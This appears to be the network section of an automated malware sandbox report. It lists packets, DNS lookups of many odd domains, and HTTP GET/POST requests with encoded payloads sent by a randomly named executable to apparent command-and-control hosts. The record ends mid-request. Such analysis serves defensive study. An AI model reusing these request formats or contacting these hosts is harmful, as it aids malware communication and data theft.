                                  Sep 16, 2024 09:32:45.251543999 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:45.257628918 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257644892 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257926941 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257947922 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257962942 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257989883 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258003950 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258047104 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258059978 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.697511911 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.697957993 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:46.758351088 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:46.763489008 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:47.787535906 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.792490959 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:47.795589924 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.811455011 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.816574097 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271414995 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271651030 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271727085 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:48.274542093 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:48.279443979 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:53.534113884 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.539799929 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:53.540324926 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.551100969 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.557811022 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009495974 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009573936 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009608984 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009644032 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009650946 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009676933 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009711981 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009744883 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009764910 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009779930 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009813070 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009845972 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009852886 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009944916 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009960890 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.010163069 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:55.055239916 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.075566053 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.080564022 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.083645105 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.095550060 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.101278067 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563927889 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563945055 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563957930 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563968897 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563981056 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563996077 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564006090 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564016104 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564026117 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564023018 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564038038 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564495087 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564547062 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:57.602276087 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.622309923 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.627228022 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.627310991 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.642357111 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.647207022 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647217035 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647228003 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647237062 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647245884 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647394896 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647403955 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647417068 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647425890 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102894068 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102920055 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102931023 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102947950 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102955103 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.102960110 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102971077 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102982998 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102982998 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.102994919 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103005886 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103007078 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103019953 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103028059 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103056908 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103074074 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103116035 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:00.149005890 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.169971943 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.175009966 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.175180912 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.185905933 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.190726995 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.650978088 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.650999069 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651010036 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651021957 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651032925 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651045084 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651057959 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651067972 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651079893 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651092052 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651124954 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651262045 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651262045 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651741982 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.652061939 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.655770063 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.660538912 CEST805584954.81.206.248192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 16, 2024 09:29:21.796139002 CEST53587741.1.1.1192.168.2.4
                                  Sep 16, 2024 09:29:35.534240961 CEST5359934162.159.36.2192.168.2.4
                                  Sep 16, 2024 09:29:36.266726017 CEST5750953192.168.2.41.1.1.1
                                  Sep 16, 2024 09:29:36.273632050 CEST53575091.1.1.1192.168.2.4
                                  Sep 16, 2024 09:29:57.424257994 CEST6471853192.168.2.41.1.1.1
                                  Sep 16, 2024 09:29:57.438783884 CEST53647181.1.1.1192.168.2.4
                                  Sep 16, 2024 09:30:12.985707045 CEST6056653192.168.2.41.1.1.1
                                  Sep 16, 2024 09:30:13.119426966 CEST53605661.1.1.1192.168.2.4
                                  Sep 16, 2024 09:30:26.277317047 CEST6293353192.168.2.41.1.1.1
                                  Sep 16, 2024 09:30:26.291018963 CEST53629331.1.1.1192.168.2.4
                                  Sep 16, 2024 09:30:46.891277075 CEST6181953192.168.2.41.1.1.1
                                  Sep 16, 2024 09:30:46.921623945 CEST53618191.1.1.1192.168.2.4
                                  Sep 16, 2024 09:31:03.045825958 CEST5603253192.168.2.41.1.1.1
                                  Sep 16, 2024 09:31:03.145997047 CEST53560321.1.1.1192.168.2.4
                                  Sep 16, 2024 09:31:16.309747934 CEST5106753192.168.2.41.1.1.1
                                  Sep 16, 2024 09:31:16.927654028 CEST53510671.1.1.1192.168.2.4
                                  Sep 16, 2024 09:31:50.966010094 CEST5266853192.168.2.41.1.1.1
                                  Sep 16, 2024 09:31:51.175597906 CEST53526681.1.1.1192.168.2.4
                                  Sep 16, 2024 09:32:04.449464083 CEST6358053192.168.2.41.1.1.1
                                  Sep 16, 2024 09:32:04.897169113 CEST53635801.1.1.1192.168.2.4
                                  Sep 16, 2024 09:32:18.184184074 CEST5796253192.168.2.41.1.1.1
                                  Sep 16, 2024 09:32:18.218533993 CEST53579621.1.1.1192.168.2.4
                                  Sep 16, 2024 09:32:32.043488026 CEST5067153192.168.2.41.1.1.1
                                  Sep 16, 2024 09:32:32.052361965 CEST53506711.1.1.1192.168.2.4
                                  Sep 16, 2024 09:32:40.122154951 CEST6096553192.168.2.41.1.1.1
                                  Sep 16, 2024 09:32:40.140762091 CEST53609651.1.1.1192.168.2.4
                                  Sep 16, 2024 09:32:53.293618917 CEST5097953192.168.2.41.1.1.1
                                  Sep 16, 2024 09:32:53.528307915 CEST53509791.1.1.1192.168.2.4
                                  Sep 16, 2024 09:33:07.011509895 CEST5687453192.168.2.41.1.1.1
                                  Sep 16, 2024 09:33:07.085104942 CEST53568741.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 16, 2024 09:29:36.266726017 CEST192.168.2.41.1.1.10x2935Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                  Sep 16, 2024 09:29:57.424257994 CEST192.168.2.41.1.1.10xd16cStandard query (0)www.aaavvejibej.bondA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:12.985707045 CEST192.168.2.41.1.1.10x7957Standard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:26.277317047 CEST192.168.2.41.1.1.10x19feStandard query (0)www.weatherbook.liveA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:46.891277075 CEST192.168.2.41.1.1.10x1a2bStandard query (0)www.crowsecurity.cloudA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:03.045825958 CEST192.168.2.41.1.1.10xc1feStandard query (0)www.inspireplay.liveA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:16.309747934 CEST192.168.2.41.1.1.10xba4aStandard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:50.966010094 CEST192.168.2.41.1.1.10xdd52Standard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:04.449464083 CEST192.168.2.41.1.1.10xc46dStandard query (0)www.selftip.topA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:18.184184074 CEST192.168.2.41.1.1.10xbb54Standard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:32.043488026 CEST192.168.2.41.1.1.10x9e46Standard query (0)www.kfowks.siteA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:40.122154951 CEST192.168.2.41.1.1.10xdfbaStandard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:53.293618917 CEST192.168.2.41.1.1.10x13fcStandard query (0)www.wajf.netA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:33:07.011509895 CEST192.168.2.41.1.1.10x22faStandard query (0)www.turbonotes.appA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 16, 2024 09:29:36.273632050 CEST1.1.1.1192.168.2.40x2935Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                  Sep 16, 2024 09:29:57.438783884 CEST1.1.1.1192.168.2.40xd16cNo error (0)www.aaavvejibej.bond104.21.31.249A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:29:57.438783884 CEST1.1.1.1192.168.2.40xd16cNo error (0)www.aaavvejibej.bond172.67.181.150A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:13.119426966 CEST1.1.1.1192.168.2.40x7957No error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:30:13.119426966 CEST1.1.1.1192.168.2.40x7957No error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:13.119426966 CEST1.1.1.1192.168.2.40x7957No error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:26.291018963 CEST1.1.1.1192.168.2.40x19feNo error (0)www.weatherbook.liveweatherbook.liveCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:30:26.291018963 CEST1.1.1.1192.168.2.40x19feNo error (0)weatherbook.live3.33.130.190A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:26.291018963 CEST1.1.1.1192.168.2.40x19feNo error (0)weatherbook.live15.197.148.33A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:46.921623945 CEST1.1.1.1192.168.2.40x1a2bNo error (0)www.crowsecurity.cloudcrowsecurity.cloudCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:30:46.921623945 CEST1.1.1.1192.168.2.40x1a2bNo error (0)crowsecurity.cloud3.33.130.190A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:30:46.921623945 CEST1.1.1.1192.168.2.40x1a2bNo error (0)crowsecurity.cloud15.197.148.33A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:03.145997047 CEST1.1.1.1192.168.2.40xc1feNo error (0)www.inspireplay.liveinspireplay.liveCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:31:03.145997047 CEST1.1.1.1192.168.2.40xc1feNo error (0)inspireplay.live3.33.130.190A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:03.145997047 CEST1.1.1.1192.168.2.40xc1feNo error (0)inspireplay.live15.197.148.33A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:16.927654028 CEST1.1.1.1192.168.2.40xba4aNo error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:31:51.175597906 CEST1.1.1.1192.168.2.40xdd52No error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:31:51.175597906 CEST1.1.1.1192.168.2.40xdd52No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:04.897169113 CEST1.1.1.1192.168.2.40xc46dNo error (0)www.selftip.top199.192.21.169A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:18.218533993 CEST1.1.1.1192.168.2.40xbb54No error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:32:18.218533993 CEST1.1.1.1192.168.2.40xbb54No error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:32.052361965 CEST1.1.1.1192.168.2.40x9e46Name error (3)www.kfowks.sitenonenoneA (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:40.140762091 CEST1.1.1.1192.168.2.40xdfbaNo error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:32:40.140762091 CEST1.1.1.1192.168.2.40xdfbaNo error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:40.140762091 CEST1.1.1.1192.168.2.40xdfbaNo error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:53.528307915 CEST1.1.1.1192.168.2.40x13fcNo error (0)www.wajf.netcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:32:53.528307915 CEST1.1.1.1192.168.2.40x13fcNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:32:53.528307915 CEST1.1.1.1192.168.2.40x13fcNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.81.206.248A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:32:53.528307915 CEST1.1.1.1192.168.2.40x13fcNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com44.199.117.82A (IP address)IN (0x0001)false
                                  Sep 16, 2024 09:33:07.085104942 CEST1.1.1.1192.168.2.40x22faNo error (0)www.turbonotes.appwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                  Sep 16, 2024 09:33:07.085104942 CEST1.1.1.1192.168.2.40x22faNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                  • www.aaavvejibej.bond
                                  • www.whats-in-the-box.org
                                  • www.weatherbook.live
                                  • www.crowsecurity.cloud
                                  • www.inspireplay.live
                                  • www.shanhaiguan.net
                                  • www.lanxuanz.tech
                                  • www.selftip.top
                                  • www.newdaydawning.net
                                  • www.o731lh.vip
                                  • www.wajf.net
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.455809104.21.31.249805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:29:57.457849026 CEST514OUTGET /lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.aaavvejibej.bond
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:29:57.902678013 CEST774INHTTP/1.1 403 Forbidden
                                  Date: Mon, 16 Sep 2024 07:29:57 GMT
                                  Content-Type: text/plain; charset=UTF-8
                                  Content-Length: 16
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Referrer-Policy: same-origin
                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWpR%2BI4f4f%2Brp%2ByE%2BGjg2jCJEDTCiHHL2xIp7cz4mT3EwEw7AY3CST4x6ar8vwQjXnWGGX9GWjVS9UsLLFbmoaeJmhFIudQhL8qC5p1OTkmbVOMYZcJhTsSbTE7JVLWZ3eaGO2fKKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8c3f2600880043be-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 30
                                  Data Ascii: error code: 1010


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.4558103.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:13.143157005 CEST795OUTPOST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 37 68 49 79 6a 33 33 43 37 66 5a 46 52 48 55 35 77 50 39 4b 56 72 4d 64 43 68 4b 39 75 35 2b 69 75 65 55 38 4e 32 45 6c 6f 48 7a 56 64 64 57 47 45 70 69 50 4e 41 68 53 50 34 4f 30 55 4c 39 35 79 34 47 76 63 79 4e 65 65 36 6f 64 53 4c 70 55 6d 76 50 48 78 30 77 76 76 69 59 39 75 51 49 59 63 44 6f 6f 31 73 62 63 32 39 51 65 50 58 6f 2b 58 71 48 37 79 79 73 4a 64 32 70 36 4d 65 64 34 68 2b 39 35 77 6b 38 70 45 46 6a 53 76 57 6e 66 53 4c 47 35 65 4f 43 4e 59 2f 50 76 69 53 4c 39 64 43 6a 30 66 61 46 57 61 4f 64 78 70 46 7a 4d 4e 54 6c 67 73 67 3d 3d
                                  Data Ascii: h2Pt9=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.4558113.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:15.719965935 CEST815OUTPOST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 36 42 34 79 73 33 4c 43 39 2f 5a 43 50 33 55 35 36 76 39 4f 56 71 77 64 43 67 4f 74 74 4b 4b 69 67 62 6f 38 4f 30 73 6c 76 48 7a 56 4a 4e 57 44 41 70 6a 69 4e 41 6b 74 50 35 79 30 55 4c 70 35 79 36 65 76 66 41 6c 5a 45 4b 6f 66 61 72 70 73 70 50 50 48 78 30 77 76 76 69 4d 48 75 51 41 59 63 79 34 6f 31 4a 76 66 71 74 51 66 4f 58 6f 2b 42 61 48 2f 79 79 73 72 64 79 78 63 4d 62 42 34 68 38 6c 35 7a 78 49 71 66 31 6a 59 69 32 6e 50 58 4b 32 39 48 4f 37 44 58 76 50 4f 72 43 50 6c 59 45 79 75 4f 72 6b 42 49 4f 35 43 30 43 36 34 41 51 59 70 33 6e 39 73 4b 47 39 42 78 6f 6e 51 67 42 58 43 6e 64 56 6f 52 57 77 3d
                                  Data Ascii: h2Pt9=Dvr+OHpWQbs86B4ys3LC9/ZCP3U56v9OVqwdCgOttKKigbo8O0slvHzVJNWDApjiNAktP5y0ULp5y6evfAlZEKofarpspPPHx0wvviMHuQAYcy4o1JvfqtQfOXo+BaH/yysrdyxcMbB4h8l5zxIqf1jYi2nPXK29HO7DXvPOrCPlYEyuOrkBIO5C0C64AQYp3n9sKG9BxonQgBXCndVoRWw=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.4558123.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:18.267452955 CEST10897OUTPOST /30jd/ HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.whats-in-the-box.org
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.whats-in-the-box.org/30jd/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
